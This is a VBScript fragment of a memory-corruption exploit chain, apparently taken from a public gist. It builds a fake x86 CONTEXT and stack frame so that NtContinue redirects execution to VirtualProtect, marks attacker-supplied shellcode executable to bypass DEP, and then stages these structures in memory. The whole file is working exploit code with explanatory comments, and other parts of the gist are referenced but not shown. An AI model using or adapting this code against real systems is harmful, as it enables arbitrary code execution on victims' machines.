Function VirtualProtectCallParameters(shellcodePtr)
    ' Builds the fake stack that NtContinue will install as ESP (see StructForNtContinue).
    ' Layout, top of stack first: [return address][lpAddress][dwSize][flNewProtect][lpflOldProtect],
    ' i.e. exactly what VirtualProtect expects to find when it starts executing, followed by
    ' the bytes StructWithNtContinueAddr contributes and padding out to 0x80000 bytes.
    ' shellcodePtr is the absolute address of the shellcode (as seen by the process).
    ' Returns the whole frame as one VBScript string (every char is two raw bytes).
    ' NOTE(review): this is DEP-bypass staging for an exploit chain; the surrounding helpers
    ' (SetVarData/ReadRawPointer/UnescapeValue) are defined elsewhere in the gist.
    Dim fillA, frame

    fillA = Unescape("%u4141")

    ' 10000 UTF-16 'A's = 20000 (0x4E20) bytes. VirtualProtect runs with ESP pointing into
    ' this region, so it has scratch stack space below the fake frame.
    frame = String(10000, fillA)

    ' Return address: when VirtualProtect returns it pops this and lands on the shellcode.
    frame = frame & UnescapeValue(shellcodePtr)
    ' 1st arg, lpAddress: the shellcode itself.
    frame = frame & UnescapeValue(shellcodePtr)
    ' 2nd arg, dwSize: 0x3000 bytes.
    frame = frame & UnescapeValue(&H3000)
    ' 3rd arg, flNewProtect: 0x40 = PAGE_EXECUTE_READWRITE.
    frame = frame & UnescapeValue(&H40)
    ' 4th arg, lpflOldProtect: a writable dword just before the shellcode.
    frame = frame & UnescapeValue(shellcodePtr - 8)

    ' 6 UTF-16 'B's = 12 bytes of alignment before the NtContinue pointer block.
    frame = frame & String(6, Unescape("%u4242"))
    ' 3 NUL bytes, the 4-byte NtContinue address, then a NUL (per that helper's layout).
    frame = frame & StructWithNtContinueAddr()

    ' Pad to 0x80000 bytes in total. LenB counts bytes, String counts 2-byte chars,
    ' hence the division by two.
    frame = frame & String((&H80000 - LenB(frame)) / 2, fillA)

    VirtualProtectCallParameters = frame
End Function
Function StructForNtContinue(structForVirtualProtect)
    ' Builds a fake x86 _CONTEXT (0x400 bytes) to hand to NtContinue. Only the fields that
    ' matter for the control-flow transfer are set: Eip = VirtualProtect, Esp = the fake
    ' stack built by VirtualProtectCallParameters, and sane CS/SS selectors; everything
    ' else is filler. The first dword is a pointer to NtContinue's address inside that
    ' fake stack (the slot StructWithNtContinueAddr fills in).
    ' structForVirtualProtect is the absolute address of the VirtualProtectCallParameters
    ' frame (the part after its 20000-byte scratch area).
    ' Returns the CONTEXT as a VBScript string (two raw bytes per char).
    Dim ctx, ntContinuePtr, fillA, fillC

    fillA = Unescape("%u4141")
    fillC = Unescape("%u4343")

    ' 5 dwords (20) + 12 bytes of 'B' + 3 NUL bytes = offset 35 of the NtContinue pointer,
    ' matching the layout VirtualProtectCallParameters emits.
    ntContinuePtr = structForVirtualProtect + 35

    ctx = UnescapeValue(ntContinuePtr)
    ' Fill the CONTEXT with 'A' up to offset 0xB8, where Eip lives on x86.
    ctx = ctx & String((&HB8 - LenB(ctx)) / 2, fillA)

    ctx = ctx & UnescapeValue(VirtualProtect)           ' 0xB8 Eip   -> VirtualProtect
    ctx = ctx & UnescapeValue(&H1B)                     ' 0xBC SegCs -> 0x1B (user-mode code selector)
    ctx = ctx & UnescapeValue(0)                        ' 0xC0 EFlags
    ctx = ctx & UnescapeValue(structForVirtualProtect)  ' 0xC4 Esp   -> fake VirtualProtect frame
    ctx = ctx & UnescapeValue(&H23)                     ' 0xC8 SegSs -> 0x23 (user-mode data selector)

    ' Pad the remainder of the 0x400-byte structure with 'C' (0x4343).
    ctx = ctx & String((&H400 - LenB(ctx)) / 2, fillC)

    StructForNtContinue = ctx
End Function
' Staging sequence. Each SetVarData/ReadRawPointer pair stores a payload string and reads
' back where it landed in memory; the fixed offsets (+8, +20000) depend on how SetVarData
' stores the string and are taken from the original author - verify against that helper.
' Order matters: the CONTEXT needs the frame's address, which needs the shellcode's address.
Call SetVarData(GetShellcode())
' +8 skips the string header so the pointer lands on the first shellcode byte.
shellcodePtr = ReadRawPointer() + 8

Call SetVarData(VirtualProtectCallParameters(shellcodePtr))
' +20000 skips the 10000-char scratch area so this points at the fake return address.
structForVirtualProtect = ReadRawPointer() + 20000

Call SetVarData(StructForNtContinue(structForVirtualProtect))